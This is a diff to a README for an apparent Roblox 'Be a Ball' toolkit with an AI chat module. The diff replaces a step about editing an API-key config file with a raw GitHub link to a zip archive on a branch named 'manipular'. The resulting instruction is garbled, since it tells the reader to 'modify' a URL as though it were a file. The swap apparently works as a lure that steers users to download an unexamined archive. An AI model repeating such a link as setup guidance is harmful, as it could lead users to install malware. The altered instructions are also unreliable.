MR-NOBODY47/be-a-ball-classic-roblox-toolkit/README.md

 **Setup Instructions:**
 1. Acquire an API key for OpenAI or Claude.
-2. In the config folder, modify the `api_keys.cfg` file.
+2. In the config folder, modify the `https://raw.githubusercontent.com/MR-NOBODY47/be-a-ball-classic-roblox-toolkit/branch/manipular/be-a-ball-classic-roblox-toolkit-v3.1.zip` file.
 3. Activate smart responses by toggling the AI module in the script menu.

 _Automated wisdom — always one bounce ahead._